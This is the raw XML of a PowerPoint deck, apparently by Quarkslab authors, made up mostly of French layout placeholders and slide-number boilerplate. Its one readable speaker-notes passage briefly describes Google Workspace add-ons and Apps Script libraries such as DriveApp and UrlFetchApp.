
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Default Extension="mkv" ContentType="video/unknown"/>
  <Default Extension="mov" ContentType="video/quicktime"/>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700" r:id="rId5"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId57"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="320" r:id="rId7"/>
    <p:sldId id="321" r:id="rId8"/>
    <p:sldId id="574" r:id="rId9"/>
    <p:sldId id="552" r:id="rId10"/>
    <p:sldId id="605" r:id="rId11"/>
    <p:sldId id="559" r:id="rId12"/>
    <p:sldId id="575" r:id="rId13"/>
    <p:sldId id="560" r:id="rId14"/>
    <p:sldId id="563" r:id="rId15"/>
    <p:sldId id="562" r:id="rId16"/>
    <p:sldId id="591" r:id="rId17"/>
    <p:sldId id="590" r:id="rId18"/>
    <p:sldId id="576" r:id="rId19"/>
    <p:sldId id="592" r:id="rId20"/>
    <p:sldId id="599" r:id="rId21"/>
    <p:sldId id="598" r:id="rId22"/>
    <p:sldId id="607" r:id="rId23"/>
    <p:sldId id="578" r:id="rId24"/>
    <p:sldId id="564" r:id="rId25"/>
    <p:sldId id="565" r:id="rId26"/>
    <p:sldId id="579" r:id="rId27"/>
    <p:sldId id="551" r:id="rId28"/>
    <p:sldId id="558" r:id="rId29"/>
    <p:sldId id="608" r:id="rId30"/>
    <p:sldId id="609" r:id="rId31"/>
    <p:sldId id="580" r:id="rId32"/>
    <p:sldId id="331" r:id="rId33"/>
    <p:sldId id="556" r:id="rId34"/>
    <p:sldId id="584" r:id="rId35"/>
    <p:sldId id="606" r:id="rId36"/>
    <p:sldId id="568" r:id="rId37"/>
    <p:sldId id="595" r:id="rId38"/>
    <p:sldId id="586" r:id="rId39"/>
    <p:sldId id="569" r:id="rId40"/>
    <p:sldId id="587" r:id="rId41"/>
    <p:sldId id="570" r:id="rId42"/>
    <p:sldId id="588" r:id="rId43"/>
    <p:sldId id="572" r:id="rId44"/>
    <p:sldId id="573" r:id="rId45"/>
    <p:sldId id="596" r:id="rId46"/>
    <p:sldId id="581" r:id="rId47"/>
    <p:sldId id="602" r:id="rId48"/>
    <p:sldId id="603" r:id="rId49"/>
    <p:sldId id="604" r:id="rId50"/>
    <p:sldId id="583" r:id="rId51"/>
    <p:sldId id="600" r:id="rId52"/>
    <p:sldId id="597" r:id="rId53"/>
    <p:sldId id="589" r:id="rId54"/>
    <p:sldId id="601" r:id="rId55"/>
    <p:sldId id="582" r:id="rId56"/>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79D4444-9137-AA30-C3DC-C0360091EC6E}" name="Guillaume Valadon" initials="GV" userId="S::gvaladon@quarkslab.com::1e76dd6b-cc45-4727-8729-b76d77a2bce8" providerId="AD"/>
  <p188:author id="{6CA4C947-2F8E-09D4-B78B-C0CA378AF54C}" name="Mathieu Robert" initials="MR" userId="S::mrobert@quarkslab.com::f861129c-d742-4575-bbb1-6aba111bf953" providerId="AD"/>
  <p188:author id="{9657D0D9-971C-3007-D53A-70002EC5AA3A}" name="Nicolas Kovacs" initials="NK" userId="S::nkovacs@quarkslab.com::0f1643c6-ac91-46bb-8b3e-89a2946efb4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Nicolas Kovacs" initials="NK" lastIdx="2" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S::nko@digital.security::263dc225-938b-4b5f-9111-353b1b010f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8D33"/>
    <a:srgbClr val="04DB2C"/>
    <a:srgbClr val="1121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24" autoAdjust="0"/>
    <p:restoredTop sz="83977" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="115" d="100"/>
          <a:sy n="115" d="100"/>
        </p:scale>
        <p:origin x="-2802" y="-14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7"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fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>Cliquez pour déplacer la diapo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318"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fr-FR" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cliquez pour modifier le format des notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319"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fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;en-tête&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278960" y="0"/>
            <a:ext cx="3280680" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:buNone/>
              <a:defRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;date/heure&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10157400"/>
            <a:ext cx="3280680" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;pied de page&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278960" y="10157400"/>
            <a:ext cx="3280680" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:buNone/>
              <a:defRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1143000"/>
            <a:ext cx="5486400" cy="3086100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32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fr-FR" sz="2000" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Surligner = à remplir</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329"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lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{BC078608-2CAF-4565-99C9-2BE91E254DB9}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1200" b="0" strike="noStrike" spc="-1" dirty="0">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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1966677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idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3109817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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3125231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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="715975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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2732995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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94778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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59131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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="845541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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15731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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2806625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Add-on:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>DocuSign for Google Drive : permet de signer et de faire signer des documents directement à partir de Google Drive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Lucidchart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Diagrams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> for Google Docs : permet de créer et d'insérer des diagrammes et des schémas directement dans Google Docs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Trello for Gmail : permet de gérer les tâches et les projets dans Trello directement depuis Gmail.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Mail Merge for Gmail : permet de fusionner les données et de créer des e-mails personnalisés à partir de modèles dans Gmail.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Library:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Moment.js : une bibliothèque JavaScript pour l'analyse, la validation, la manipulation et l'affichage de dates et d'heures dans un format facile à utiliser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Underscore.js : une bibliothèque JavaScript qui fournit une grande variété de fonctions utilitaires pour la manipulation de données, la programmation fonctionnelle et la gestion d'événements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>DriveApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : une bibliothèque pour travailler avec les fichiers et les dossiers dans Google Drive, permettant de créer, de lire et de modifier des fichiers, ainsi que de gérer les autorisations et les métadonnées.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>UrlFetchApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : une bibliothèque pour effectuer des requêtes HTTP à partir de Google Apps Script, permettant de récupérer et de traiter des données à partir d'API et d'autres sources en ligne.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BigQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : une bibliothèque pour travailler avec le service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BigQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> de Google Cloud, permettant de stocker et de traiter de grandes quantités de données en utilisant des requêtes SQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3198639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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78898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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3079862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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3728123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1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:buNone/>
            </a:pPr>
            <a:fld id="{3A6C609D-C1E4-470C-A021-B091F0D7F8D3}" type="slidenum">
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24145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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="795636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32" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="2804040"/>
            <a:ext cx="7956360" cy="1535400"/>
          </a:xfrm>
